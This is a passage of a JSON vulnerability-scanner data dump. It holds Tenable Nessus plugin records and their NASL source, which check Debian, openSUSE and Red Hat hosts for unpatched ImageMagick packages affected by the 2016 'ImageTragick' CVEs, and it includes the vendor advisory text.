prefix:\"libmagickcore-6.q16-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickwand-6-headers\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickwand-6.q16-2\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickwand-6.q16-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickwand-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"perlmagick\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:30:25", "description": "This update for ImageMagick fixes the following issues :\n\nThe update disables various insecure coders [boo#978061] These fix\nissues tracked in CVE-2016-3714, CVE-2016-3715, CVE-2016-3716,\nCVE-2016-3717, CVE-2016-3718", "edition": 20, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-09T00:00:00", "title": "openSUSE Security Update : ImageMagick (openSUSE-2016-569) (ImageTragick)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-09T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:perl-PerlMagick-debuginfo", "p-cpe:/a:novell:opensuse:ImageMagick-debuginfo", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-debuginfo", "p-cpe:/a:novell:opensuse:ImageMagick-devel-32bit", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-debuginfo-32bit", "p-cpe:/a:novell:opensuse:ImageMagick-devel", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-32bit", "p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5-32bit", "p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-debuginfo", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-debuginfo-32bit", "p-cpe:/a:novell:opensuse:ImageMagick-extra", "p-cpe:/a:novell:opensuse:ImageMagick-debugsource", "p-cpe:/a:novell:opensuse:ImageMagick-extra-debuginfo", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2", "p-cpe:/a:novell:opensuse:ImageMagick", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-32bit", "p-cpe:/a:novell:opensuse:libMagick++-devel-32bit", "p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5-debuginfo", "p-cpe:/a:novell:opensuse:perl-PerlMagick", "p-cpe:/a:novell:opensuse:libMagick++-devel"], "id": "OPENSUSE-2016-569.NASL", "href": "https://www.tenable.com/plugins/nessus/90981", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-569.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90981);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n\n script_name(english:\"openSUSE Security Update : ImageMagick (openSUSE-2016-569) (ImageTragick)\");\n script_summary(english:\"Check for the openSUSE-2016-569 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ImageMagick fixes the following issues :\n\nThe update disables various insecure coders [boo#978061] These fix\nissues tracked in CVE-2016-3714, CVE-2016-3715, CVE-2016-3716,\nCVE-2016-3717, CVE-2016-3718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978061\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ImageMagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-PerlMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-PerlMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-debugsource-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-devel-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-extra-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-extra-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagick++-6_Q16-5-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagick++-6_Q16-5-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagick++-devel-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagickCore-6_Q16-2-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagickCore-6_Q16-2-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagickWand-6_Q16-2-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagickWand-6_Q16-2-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"perl-PerlMagick-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"perl-PerlMagick-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"ImageMagick-devel-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-5-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-5-debuginfo-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagick++-devel-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-2-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-2-debuginfo-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-2-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-2-debuginfo-32bit-6.8.9.8-18.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-debuginfo / ImageMagick-debugsource / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-06T13:46:05", "description": "An update for ImageMagick is now available for Red Hat Enterprise\nLinux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window\nSystem that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and\npseudo-protocols did not properly prevent security sensitive\noperations when processing specially crafted images. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would allow the attacker to delete, move, or\ndisclose the contents of arbitrary files. (CVE-2016-3715,\nCVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.", "edition": 31, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-11T00:00:00", "title": "RHEL 6 / 7 : ImageMagick (RHSA-2016:0726) (ImageTragick)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-11T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:6.7", "p-cpe:/a:redhat:enterprise_linux:ImageMagick", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.7", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-perl", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-devel", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-debuginfo", "cpe:/o:redhat:enterprise_linux:7.3", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-c\\+\\+", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-doc", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-c\\+\\+-devel"], "id": "REDHAT-RHSA-2016-0726.NASL", "href": "https://www.tenable.com/plugins/nessus/91036", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0726. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91036);\n script_version(\"2.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"RHSA\", value:\"2016:0726\");\n\n script_name(english:\"RHEL 6 / 7 : ImageMagick (RHSA-2016:0726) (ImageTragick)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for ImageMagick is now available for Red Hat Enterprise\nLinux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window\nSystem that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and\npseudo-protocols did not properly prevent security sensitive\noperations when processing specially crafted images. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would allow the attacker to delete, move, or\ndisclose the contents of arbitrary files. (CVE-2016-3715,\nCVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3714\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3716\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3717\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3718\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-c\\+\\+\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-c\\+\\+-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0726\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"ImageMagick-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"ImageMagick-c++-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"ImageMagick-c++-devel-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"ImageMagick-debuginfo-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"ImageMagick-devel-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-c++-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-c++-devel-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-debuginfo-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-devel-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"ImageMagick-doc-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ImageMagick-doc-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"ImageMagick-perl-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ImageMagick-perl-6.7.8.9-13.el7_2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-c++ / ImageMagick-c++-devel / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:30:37", "description": "An update for ImageMagick is now available for Red Hat Enterprise\nLinux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window\nSystem that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and\npseudo-protocols did not properly prevent security sensitive\noperations when processing specially crafted images. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would allow the attacker to delete, move, or\ndisclose the contents of arbitrary files. (CVE-2016-3715,\nCVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.", "edition": 30, "cvss3": {"score": 8.4, "vector": 